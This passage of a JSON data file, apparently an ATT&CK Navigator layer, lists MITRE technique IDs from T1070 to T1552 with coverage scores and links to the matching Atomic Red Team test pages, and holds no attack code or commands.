Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":77,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1529","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1531","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":45,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.001","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":42,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":38,"enabled":true,"links":[{"label":"View 